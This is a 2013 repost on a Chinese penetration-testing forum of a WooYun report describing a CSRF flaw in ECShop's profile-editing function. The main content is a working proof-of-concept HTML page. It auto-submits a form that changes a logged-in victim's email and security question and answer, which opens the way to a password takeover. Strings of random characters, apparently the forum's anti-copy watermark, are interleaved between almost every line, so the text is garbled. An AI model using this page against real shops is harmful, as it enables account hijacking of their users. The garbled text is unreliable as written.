中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
! g6 @" f) X: f# B+ ]$ X. f
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
% W7 s) y5 `6 U' n
( v% d: B8 ^2 _+ j1 \) X
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
! G. i+ h l3 j, `. |
5 h/ y5 @1 A0 U4 y! g% ~) [
详细说明:
& |" X$ [9 f% ?
利用csrf和xss可以突破官方所说的“障碍”
1 m2 g' Q D2 [
xss版本已经有人说明
+ Z9 c" B4 f2 \4 O2 u( V9 f' R
这里给出csrf版本
O* {# G h0 z7 H3 A8 M: C
$ V5 j, t& h4 z: v5 w, V0 `- D
漏洞证明:
% g' S! t7 O: O* T
<html>
4 X4 B, v% E8 S! G
<body>
# \. F: h$ R6 H
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
, B j* h6 Z: | F
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. M) r8 D! `( |
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
9 ]# u8 W7 D* P3 n1 H8 I2 H
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
3 Y4 I- w5 W- H$ }0 P' F( \
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
, ? U% M3 c ]& R) Q; N
</body>
7 w" v/ b; q7 V( U
<script>
. H! t+ n/ i7 _' [; k& f! q1 e! W
document.forms[0].submit();
4 a1 [. ^) R2 L& ~$ s" D- O/ v v
</script>
, ~, e% H8 H0 ^# e. R2 @* T2 C7 T
</html>
7 Z! B" L0 ?8 y8 z. V: W, n
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
; R9 u) J( r0 |' j; ^' r
N, H; ^! a8 {/ e" y {$ E [
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2